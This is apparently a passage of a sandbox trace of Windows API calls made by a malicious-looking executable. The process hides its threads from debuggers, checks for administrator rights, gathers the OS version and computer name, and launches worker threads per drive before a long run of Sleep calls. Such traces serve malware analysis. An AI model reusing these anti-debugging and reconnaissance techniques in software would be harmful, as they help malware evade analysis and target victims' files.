(ThreadHandle=0x1a0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.647] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x234, lpBytesBuffer=0x0) returned 0x0 [0068.648] NtSetInformationThread (ThreadHandle=0x234, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.648] NtSetInformationThread (ThreadHandle=0x1a0, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.648] NtSetInformationThread (ThreadHandle=0x234, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.648] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f83c | out: TokenHandle=0x18f83c*=0x238) returned 0x0 [0068.648] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x18f7f4, cbSid=0x18f840 | out: pSid=0x18f7f4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0x18f840) returned 1 [0068.648] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x18f7f4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f844 | out: IsMember=0x18f844) returned 1 [0068.648] CloseHandle (hObject=0x238) returned 1 [0068.648] GetVersionExA (in: lpVersionInformation=0x18f9e8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18f9e8*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0068.648] NetWkstaGetInfo (in: servername=0x0, level=0x64, bufptr=0x18fb90 | out: bufptr=0x18fb90) returned 0x0 [0073.412] GetSystemInfo (in: lpSystemInfo=0x18f9c4 | out: lpSystemInfo=0x18f9c4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0073.413] wvsprintfA (in: param_1=0x18f310, param_2="OS: Win 7", arglist=0x18f850 | out: param_1="OS: Win 7") returned 9 [0073.413] wsprintfA (in: param_1=0x18f310, param_2="%s\r\n" | out: param_1="OS: Win 7\r\n") returned 11 [0073.413] GetLocalTime (in: lpSystemTime=0x18f810 | out: lpSystemTime=0x18f810*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0xbd)) [0073.413] wsprintfA (in: param_1=0x18f710, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0073.413] SetThreadUILanguage (LangId=0x409) returned 0x409 [0073.413] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0073.414] WriteFile (in: hFile=0x7, lpBuffer=0x18f710*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18f83c, lpOverlapped=0x0 | out: lpBuffer=0x18f710*, lpNumberOfBytesWritten=0x18f83c*=0xb, lpOverlapped=0x0) returned 1 [0073.414] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0073.414] WriteFile (in: hFile=0x7, lpBuffer=0x18f310*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18f83c, lpOverlapped=0x0 | out: lpBuffer=0x18f310*, lpNumberOfBytesWritten=0x18f83c*=0xb, lpOverlapped=0x0) returned 1 [0073.415] GetConsoleWindow () returned 0x5011c [0073.415] IsWindowVisible (hWnd=0x5011c) returned 0 [0073.415] GetLocalTime (in: lpSystemTime=0x18faa8 | out: lpSystemTime=0x18faa8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0xbd)) [0073.415] wvsprintfA (in: param_1=0x18f300, param_2="Local time: %d.%d %d:%d", arglist=0x18f840 | out: param_1="Local time: 28.3 8:19") returned 21 [0073.415] wsprintfA (in: param_1=0x18f300, param_2="%s\r\n" | out: param_1="Local time: 28.3 8:19\r\n") returned 23 [0073.415] GetLocalTime (in: lpSystemTime=0x18f800 | out: lpSystemTime=0x18f800*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0xbd)) [0073.415] wsprintfA (in: param_1=0x18f700, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0073.418] SetThreadUILanguage (LangId=0x409) returned 0x409 [0073.418] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0073.418] WriteFile (in: hFile=0x7, lpBuffer=0x18f700*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x18f700*, lpNumberOfBytesWritten=0x18f82c*=0xb, lpOverlapped=0x0) returned 1 [0073.419] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0073.419] WriteFile (in: hFile=0x7, lpBuffer=0x18f300*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x18f82c, lpOverlapped=0x0 | out: lpBuffer=0x18f300*, lpNumberOfBytesWritten=0x18f82c*=0x17, lpOverlapped=0x0) returned 1 [0073.419] GetConsoleWindow () returned 0x5011c [0073.420] IsWindowVisible (hWnd=0x5011c) returned 0 [0073.420] GetComputerNameA (in: lpBuffer=0x18f980, nSize=0x18fb04 | out: lpBuffer="XDUWTFONO", nSize=0x18fb04) returned 1 [0073.422] wvsprintfA (in: param_1=0x18f30c, param_2="PC: %s", arglist=0x18f84c | out: param_1="PC: XDUWTFONO") returned 13 [0073.422] wsprintfA (in: param_1=0x18f30c, param_2="%s\r\n" | out: param_1="PC: XDUWTFONO\r\n") returned 15 [0073.422] GetLocalTime (in: lpSystemTime=0x18f80c | out: lpSystemTime=0x18f80c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0xcd)) [0073.422] wsprintfA (in: param_1=0x18f70c, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0073.422] SetThreadUILanguage (LangId=0x409) returned 0x409 [0073.422] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0073.424] WriteFile (in: hFile=0x7, lpBuffer=0x18f70c*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18f838, lpOverlapped=0x0 | out: lpBuffer=0x18f70c*, lpNumberOfBytesWritten=0x18f838*=0xb, lpOverlapped=0x0) returned 1 [0073.424] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0073.425] WriteFile (in: hFile=0x7, lpBuffer=0x18f30c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x18f838, lpOverlapped=0x0 | out: lpBuffer=0x18f30c*, lpNumberOfBytesWritten=0x18f838*=0xf, lpOverlapped=0x0) returned 1 [0073.425] GetConsoleWindow () returned 0x5011c [0073.425] IsWindowVisible (hWnd=0x5011c) returned 0 [0073.425] wvsprintfA (in: param_1=0x18f660, param_2="IOCP initialized!", arglist=0x18fba0 | out: param_1="IOCP initialized!") returned 17 [0073.425] wsprintfA (in: param_1=0x18f660, param_2="%s\r\n" | out: param_1="IOCP initialized!\r\n") returned 19 [0073.425] GetLocalTime (in: lpSystemTime=0x18fb60 | out: lpSystemTime=0x18fb60*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x34, wMilliseconds=0xcd)) [0073.425] wsprintfA (in: param_1=0x18fa60, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:52] ") returned 11 [0073.426] SetThreadUILanguage (LangId=0x409) returned 0x409 [0073.426] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0073.426] WriteFile (in: hFile=0x7, lpBuffer=0x18fa60*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18fa60*, lpNumberOfBytesWritten=0x18fb8c*=0xb, lpOverlapped=0x0) returned 1 [0073.426] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0073.426] WriteFile (in: hFile=0x7, lpBuffer=0x18f660*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18f660*, lpNumberOfBytesWritten=0x18fb8c*=0x13, lpOverlapped=0x0) returned 1 [0073.427] GetConsoleWindow () returned 0x5011c [0073.427] IsWindowVisible (hWnd=0x5011c) returned 0 [0073.427] NtCreateThreadEx (in: ThreadHandle=0x18fc04, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x409990, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fc04*=0x2cc, lpBytesBuffer=0x0) returned 0x0 [0073.428] NtSetInformationThread (ThreadHandle=0x2cc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.428] NtCreateThreadEx (in: ThreadHandle=0x18fc04, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a290, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fc04*=0x2d0, lpBytesBuffer=0x0) returned 0x0 [0073.429] NtSetInformationThread (ThreadHandle=0x2d0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.429] GetTickCount () returned 0x114bbc1 [0073.429] NtCreateThreadEx (in: ThreadHandle=0x18fba4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41e6f0, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fba4*=0x2d4, lpBytesBuffer=0x0) returned 0x0 [0073.430] NtSetInformationThread (ThreadHandle=0x2d4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.430] NtCreateThreadEx (in: ThreadHandle=0x18fba4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a340, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fba4*=0x2d8, lpBytesBuffer=0x0) returned 0x0 [0073.431] NtSetInformationThread (ThreadHandle=0x2d8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.431] NtCreateThreadEx (in: ThreadHandle=0x18fba4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a320, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fba4*=0x2dc, lpBytesBuffer=0x0) returned 0x0 [0073.431] NtSetInformationThread (ThreadHandle=0x2dc, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.432] GetLogicalDrives () returned 0x4 [0073.432] GetDriveTypeW (lpRootPathName="C:") returned 0x3 [0073.432] malloc (_Size=0xa) returned 0x1fa2af0 [0073.432] wsprintfW (in: param_1=0x1fa2af0, param_2="%s\\" | out: param_1="C:\\") returned 3 [0073.432] NtCreateThreadEx (in: ThreadHandle=0x18fba4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x40a910, lpParameter=0x1fa2af0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fba4*=0x2e0, lpBytesBuffer=0x0) returned 0x0 [0073.433] NtSetInformationThread (ThreadHandle=0x2e0, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0073.433] Sleep (dwMilliseconds=0x3a98) [0089.828] WaitForMultipleObjects (nCount=0x6, lpHandles=0x427960*=0x2d4, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x4 [0089.829] wvsprintfA (in: param_1=0x18f670, param_2="threads closed, waiting handles...", arglist=0x18fbb0 | out: param_1="threads closed, waiting handles...") returned 34 [0089.829] wsprintfA (in: param_1=0x18f670, param_2="%s\r\n" | out: param_1="threads closed, waiting handles...\r\n") returned 36 [0089.829] GetLocalTime (in: lpSystemTime=0x18fb70 | out: lpSystemTime=0x18fb70*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x14, wSecond=0x2, wMilliseconds=0x30e)) [0089.829] wsprintfA (in: param_1=0x18fa70, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:20:07] ") returned 11 [0089.829] SetThreadUILanguage (LangId=0x409) returned 0x409 [0089.829] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0089.847] WriteFile (in: hFile=0x7, lpBuffer=0x18fa70*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18fb9c, lpOverlapped=0x0 | out: lpBuffer=0x18fa70*, lpNumberOfBytesWritten=0x18fb9c*=0xb, lpOverlapped=0x0) returned 1 [0089.848] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0089.848] WriteFile (in: hFile=0x7, lpBuffer=0x18f670*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x18fb9c, lpOverlapped=0x0 | out: lpBuffer=0x18f670*, lpNumberOfBytesWritten=0x18fb9c*=0x24, lpOverlapped=0x0) returned 1 [0089.848] GetConsoleWindow () returned 0x5011c [0089.848] IsWindowVisible (hWnd=0x5011c) returned 0 [0089.848] Sleep (dwMilliseconds=0x64) [0089.972] Sleep (dwMilliseconds=0x64) [0090.704] Sleep (dwMilliseconds=0x64) [0090.798] Sleep (dwMilliseconds=0x64) [0091.040] Sleep (dwMilliseconds=0x64) [0091.150] Sleep (dwMilliseconds=0x64) [0091.250] Sleep (dwMilliseconds=0x64) [0091.364] Sleep (dwMilliseconds=0x64) [0091.469] Sleep (dwMilliseconds=0x64) [0091.578] Sleep (dwMilliseconds=0x64) [0091.687] Sleep (dwMilliseconds=0x64) [0091.897] Sleep (dwMilliseconds=0x64) [0091.999] Sleep (dwMilliseconds=0x64) [0092.184] Sleep (dwMilliseconds=0x64) [0092.281] Sleep (dwMilliseconds=0x64) [0092.481] Sleep (dwMilliseconds=0x64) [0092.690] Sleep (dwMilliseconds=0x64) [0092.798] Sleep (dwMilliseconds=0x64) [0092.950] Sleep (dwMilliseconds=0x64) [0093.049] Sleep (dwMilliseconds=0x64) [0093.169] Sleep (dwMilliseconds=0x64) [0093.332] Sleep (dwMilliseconds=0x64) [0093.519] Sleep (dwMilliseconds=0x64) [0095.157] Sleep (dwMilliseconds=0x64) [0095.359] Sleep (dwMilliseconds=0x64) [0095.475] Sleep (dwMilliseconds=0x64) [0095.582] Sleep (dwMilliseconds=0x64) [0095.806] Sleep (dwMilliseconds=0x64) [0095.940] Sleep (dwMilliseconds=0x64) [0096.077] Sleep (dwMilliseconds=0x64) [0096.299] Sleep (dwMilliseconds=0x64) [0096.399] Sleep (dwMilliseconds=0x64) [0096.547] Sleep (dwMilliseconds=0x64) [0097.096] Sleep (dwMilliseconds=0x64) [0097.199] Sleep (dwMilliseconds=0x64) [0097.368] Sleep (dwMilliseconds=0x64) [0097.568] Sleep (dwMilliseconds=0x64) [0097.685] Sleep (dwMilliseconds=0x64) [0097.787] Sleep (dwMilliseconds=0x64) [0097.896] Sleep (dwMilliseconds=0x64) [0098.006] Sleep (dwMilliseconds=0x64) [0098.115] Sleep (dwMilliseconds=0x64) [0098.224] Sleep (dwMilliseconds=0x64) [0098.333] Sleep (dwMilliseconds=0x64) [0100.155] Sleep (dwMilliseconds=0x64) [0100.253] Sleep (dwMilliseconds=0x64) [0100.361] Sleep (dwMilliseconds=0x64) [0100.497] Sleep (dwMilliseconds=0x64) [0100.596] Sleep (dwMilliseconds=0x64) [0100.731] Sleep (dwMilliseconds=0x64) [0100.830] Sleep (dwMilliseconds=0x64) [0101.128] Sleep (dwMilliseconds=0x64) [0101.387] Sleep (dwMilliseconds=0x64) [0101.485] Sleep (dwMilliseconds=0x64) [0101.770] Sleep (dwMilliseconds=0x64) [0102.033] Sleep (dwMilliseconds=0x64) [0102.193] Sleep (dwMilliseconds=0x64) [0102.297] Sleep (dwMilliseconds=0x64) [0102.405] Sleep (dwMilliseconds=0x64) [0102.780] Sleep (dwMilliseconds=0x64) [0102.878] Sleep (dwMilliseconds=0x64) [0102.998] Sleep (dwMilliseconds=0x64) [0103.113] Sleep (dwMilliseconds=0x64) [0103.222] Sleep (dwMilliseconds=0x64) [0103.404] Sleep (dwMilliseconds=0x64) [0103.596] Sleep (dwMilliseconds=0x64) [0103.700] Sleep (dwMilliseconds=0x64) [0104.494] Sleep (dwMilliseconds=0x64) [0105.303] Sleep (dwMilliseconds=0x64) [0105.428] Sleep (dwMilliseconds=0x64) [0105.525] Sleep (dwMilliseconds=0x64) [0105.634] Sleep (dwMilliseconds=0x64) [0105.743] Sleep (dwMilliseconds=0x64) [0106.288] Sleep (dwMilliseconds=0x64) [0106.387] Sleep (dwMilliseconds=0x64) [0106.512] Sleep (dwMilliseconds=0x64) [0106.721] Sleep (dwMilliseconds=0x64) [0108.021] Sleep (dwMilliseconds=0x64) [0108.292] Sleep (dwMilliseconds=0x64) [0108.398] Sleep (dwMilliseconds=0x64) [0108.515] Sleep (dwMilliseconds=0x64) [0108.613] Sleep (dwMilliseconds=0x64) [0109.114] Sleep (dwMilliseconds=0x64) [0109.229] Sleep (dwMilliseconds=0x64) [0109.331] Sleep (dwMilliseconds=0x64) [0109.484] Sleep (dwMilliseconds=0x64) [0109.686] Sleep (dwMilliseconds=0x64) [0109.916] Sleep (dwMilliseconds=0x64) [0110.025] Sleep (dwMilliseconds=0x64) [0110.127] Sleep (dwMilliseconds=0x64) [0110.240] Sleep (dwMilliseconds=0x64) [0110.346] Sleep (dwMilliseconds=0x64) [0112.124] Sleep (dwMilliseconds=0x64) [0112.326] Sleep (dwMilliseconds=0x64) [0112.420] Sleep (dwMilliseconds=0x64) [0112.699] Sleep (dwMilliseconds=0x64) [0112.865] Sleep (dwMilliseconds=0x64) [0113.072] Sleep (dwMilliseconds=0x64) [0113.333] Sleep (dwMilliseconds=0x64) [0113.569] Sleep (dwMilliseconds=0x64) [0113.693] Sleep (dwMilliseconds=0x64) [0113.798] Sleep (dwMilliseconds=0x64) [0114.028] Sleep (dwMilliseconds=0x64) [0114.231] Sleep (dwMilliseconds=0x64) [0114.390] Sleep (dwMilliseconds=0x64) [0114.596] Sleep (dwMilliseconds=0x64) [0114.783] Sleep (dwMilliseconds=0x64) [0115.603] Sleep (dwMilliseconds=0x64) [0115.843] Sleep (dwMilliseconds=0x64) [0116.225] Sleep (dwMilliseconds=0x64) [0116.338] Sleep (dwMilliseconds=0x64) [0116.459] Sleep (dwMilliseconds=0x64) [0116.554] Sleep (dwMilliseconds=0x64) [0116.664] Sleep (dwMilliseconds=0x64) [0116.772] Sleep (dwMilliseconds=0x64) [0116.881] Sleep (dwMilliseconds=0x64) [0116.991] Sleep (dwMilliseconds=0x64) [0117.109] Sleep (dwMilliseconds=0x64) [0117.267] Sleep (dwMilliseconds=0x64) [0117.676] Sleep (dwMilliseconds=0x64) [0117.798] Sleep (dwMilliseconds=0x64) [0118.002] Sleep (dwMilliseconds=0x64) [0118.180] Sleep (dwMilliseconds=0x64) [0118.416] Sleep (dwMilliseconds=0x64) [0118.545] Sleep (dwMilliseconds=0x64) [0118.780] Sleep (dwMilliseconds=0x64) [0119.016] Sleep (dwMilliseconds=0x64) [0119.510] Sleep (dwMilliseconds=0x64) [0120.386] Sleep (dwMilliseconds=0x64) [0120.487] Sleep (dwMilliseconds=0x64) [0120.674] Sleep (dwMilliseconds=0x64) [0120.870] Sleep (dwMilliseconds=0x64) [0120.969] Sleep (dwMilliseconds=0x64) [0121.165] Sleep (dwMilliseconds=0x64) [0121.269] Sleep (dwMilliseconds=0x64) [0121.385] Sleep (dwMilliseconds=0x64) [0121.483] Sleep (dwMilliseconds=0x64) [0121.780] Sleep (dwMilliseconds=0x64) [0121.889] Sleep (dwMilliseconds=0x64) [0122.000] Sleep (dwMilliseconds=0x64) [0122.107] Sleep (dwMilliseconds=0x64) [0122.217] Sleep (dwMilliseconds=0x64) [0122.326] Sleep (dwMilliseconds=0x64) [0122.435] Sleep (dwMilliseconds=0x64) [0122.551] Sleep (dwMilliseconds=0x64) [0122.654] Sleep (dwMilliseconds=0x64) [0122.771] Sleep (dwMilliseconds=0x64) [0122.902] Sleep (dwMilliseconds=0x64) [0123.722] Sleep (dwMilliseconds=0x64) [0123.948] Sleep (dwMilliseconds=0x64) [0124.058] Sleep (dwMilliseconds=0x64) [0124.263] Sleep (dwMilliseconds=0x64) [0124.371] Sleep (dwMilliseconds=0x64) [0124.574] Sleep (dwMilliseconds=0x64) [0125.001] Sleep (dwMilliseconds=0x64) [0125.105] Sleep (dwMilliseconds=0x64) [0126.268] Sleep (dwMilliseconds=0x64) [0126.367] Sleep (dwMilliseconds=0x64) [0126.476] Sleep (dwMilliseconds=0x64) [0126.585] Sleep (dwMilliseconds=0x64) [0126.694] Sleep (dwMilliseconds=0x64) [0126.804] Sleep (dwMilliseconds=0x64) [0126.913] Sleep (dwMilliseconds=0x64) [0127.022] Sleep (dwMilliseconds=0x64) [0127.137] Sleep (dwMilliseconds=0x64) [0127.240] Sleep (dwMilliseconds=0x64) [0127.349] Sleep (dwMilliseconds=0x64) [0127.459] Sleep (dwMilliseconds=0x64) [0127.568] Sleep (dwMilliseconds=0x64) [0127.677] Sleep (dwMilliseconds=0x64) [0127.786] Sleep (dwMilliseconds=0x64) [0127.896] Sleep (dwMilliseconds=0x64) [0128.020] Sleep (dwMilliseconds=0x64) [0128.129] Sleep (dwMilliseconds=0x64) [0128.239] Sleep (dwMilliseconds=0x64) [0128.348] Sleep (dwMilliseconds=0x64) [0128.457] Sleep (dwMilliseconds=0x64) [0128.566] Sleep (dwMilliseconds=0x64) [0128.676] Sleep (dwMilliseconds=0x64) [0128.785] Sleep (dwMilliseconds=0x64) [0128.897] Sleep (dwMilliseconds=0x64) [0129.003] Sleep (dwMilliseconds=0x64) [0129.113] Sleep (dwMilliseconds=0x64) [0129.222] Sleep (dwMilliseconds=0x64) [0129.331] Sleep (dwMilliseconds=0x64) [0129.440] Sleep (dwMilliseconds=0x64) [0129.549] Sleep (dwMilliseconds=0x64) [0129.658] Sleep (dwMilliseconds=0x64) [0129.767] Sleep (dwMilliseconds=0x64) [0129.877] Sleep (dwMilliseconds=0x64) [0129.986] Sleep (dwMilliseconds=0x64) [0130.095] Sleep (dwMilliseconds=0x64) [0130.204] Sleep (dwMilliseconds=0x64) [0130.313] Sleep (dwMilliseconds=0x64) [0130.423] Sleep (dwMilliseconds=0x64) [0130.531] Sleep (dwMilliseconds=0x64) [0130.641] Sleep (dwMilliseconds=0x64) [0130.750] Sleep (dwMilliseconds=0x64) [0130.863] Sleep (dwMilliseconds=0x64) [0130.969] Sleep (dwMilliseconds=0x64) [0131.078] Sleep (dwMilliseconds=0x64) [0131.187] Sleep (dwMilliseconds=0x64) [0131.296] Sleep (dwMilliseconds=0x64) [0131.406] Sleep (dwMilliseconds=0x64) [0131.515] Sleep (dwMilliseconds=0x64) [0131.626] Sleep (dwMilliseconds=0x64) [0131.733] Sleep (dwMilliseconds=0x64) [0131.842] Sleep (dwMilliseconds=0x64) [0131.952] Sleep (dwMilliseconds=0x64) [0132.061] Sleep (dwMilliseconds=0x64) [0132.171] Sleep (dwMilliseconds=0x64) [0132.279] Sleep (dwMilliseconds=0x64) [0132.388] Sleep (dwMilliseconds=0x64) [0132.497] Sleep (dwMilliseconds=0x64) [0132.607] Sleep (dwMilliseconds=0x64) [0132.716] Sleep (dwMilliseconds=0x64) [0132.825] Sleep (dwMilliseconds=0x64) [0132.934] Sleep (dwMilliseconds=0x64) [0133.057] Sleep (dwMilliseconds=0x64) [0133.152] Sleep (dwMilliseconds=0x64) [0133.261] Sleep (dwMilliseconds=0x64) [0133.371] Sleep (dwMilliseconds=0x64) [0133.480] Sleep (dwMilliseconds=0x64) [0133.590] Sleep (dwMilliseconds=0x64) [0133.699] Sleep (dwMilliseconds=0x64) [0133.808] Sleep (dwMilliseconds=0x64) [0133.923] Sleep (dwMilliseconds=0x64) [0134.026] Sleep (dwMilliseconds=0x64) [0134.136] Sleep (dwMilliseconds=0x64) [0134.245] Sleep (dwMilliseconds=0x64) [0134.356] Sleep (dwMilliseconds=0x64) [0134.463] Sleep (dwMilliseconds=0x64) [0134.572] Sleep (dwMilliseconds=0x64) [0134.682] Sleep (dwMilliseconds=0x64) [0134.791] Sleep (dwMilliseconds=0x64) [0134.900] Sleep (dwMilliseconds=0x64) [0135.009] Sleep (dwMilliseconds=0x64) [0135.118] Sleep (dwMilliseconds=0x64) [0135.228] Sleep (dwMilliseconds=0x64) [0135.337] Sleep (dwMilliseconds=0x64) [0135.446] Sleep (dwMilliseconds=0x64) [0135.555] Sleep (dwMilliseconds=0x64) [0135.664] Sleep (dwMilliseconds=0x64) [0135.781] Sleep (dwMilliseconds=0x64) [0135.883] Sleep (dwMilliseconds=0x64) [0135.992] Sleep (dwMilliseconds=0x64) [0136.155] Sleep (dwMilliseconds=0x64) [0136.257] Sleep (dwMilliseconds=0x64) [0136.366] Sleep (dwMilliseconds=0x64) [0136.475] Sleep (dwMilliseconds=0x64) [0136.585] Sleep (dwMilliseconds=0x64) [0136.696] Sleep (dwMilliseconds=0x64) [0136.803] Sleep (dwMilliseconds=0x64) [0136.912] Sleep (dwMilliseconds=0x64) [0137.022] Sleep (dwMilliseconds=0x64) [0137.131] Sleep (dwMilliseconds=0x64) [0137.240] Sleep (dwMilliseconds=0x64) [0137.349] Sleep (dwMilliseconds=0x64) [0137.458] Sleep (dwMilliseconds=0x64) [0137.567] Sleep (dwMilliseconds=0x64) [0137.677] Sleep (dwMilliseconds=0x64) [0137.786] Sleep (dwMilliseconds=0x64) [0137.895] Sleep (dwMilliseconds=0x64) [0138.006] Sleep (dwMilliseconds=0x64) [0138.153] Sleep (dwMilliseconds=0x64) [0138.259] Sleep (dwMilliseconds=0x64) [0138.388] Sleep (dwMilliseconds=0x64) [0138.629] Sleep (dwMilliseconds=0x64) [0138.777] Sleep (dwMilliseconds=0x64) [0138.927] Sleep (dwMilliseconds=0x64) [0139.042] Sleep (dwMilliseconds=0x64) [0139.146] Sleep (dwMilliseconds=0x64) [0139.256] Sleep (dwMilliseconds=0x64) [0139.383] Sleep (dwMilliseconds=0x64) [0139.557] Sleep (dwMilliseconds=0x64) [0139.680] Sleep (dwMilliseconds=0x64) [0139.804] Sleep (dwMilliseconds=0x64) [0140.416] Sleep (dwMilliseconds=0x64) [0141.407] Sleep (dwMilliseconds=0x64) [0141.646] Sleep (dwMilliseconds=0x64) [0141.748] Sleep (dwMilliseconds=0x64) [0141.867] Sleep (dwMilliseconds=0x64) [0142.044] Sleep (dwMilliseconds=0x64) [0142.208] Sleep (dwMilliseconds=0x64) [0142.816] Sleep (dwMilliseconds=0x64) [0142.961] Sleep (dwMilliseconds=0x64) [0143.257] Sleep (dwMilliseconds=0x64) [0143.674] Sleep (dwMilliseconds=0x64) [0143.778] Sleep (dwMilliseconds=0x64) [0144.164] Sleep (dwMilliseconds=0x64) [0144.306] Sleep (dwMilliseconds=0x64) [0144.400] Sleep (dwMilliseconds=0x64) [0144.511] Sleep (dwMilliseconds=0x64) [0144.623] Sleep (dwMilliseconds=0x64) [0144.824] Sleep (dwMilliseconds=0x64) [0145.559] Sleep (dwMilliseconds=0x64) [0145.669] Sleep (dwMilliseconds=0x64) [0145.837] Sleep (dwMilliseconds=0x64) [0146.036] Sleep 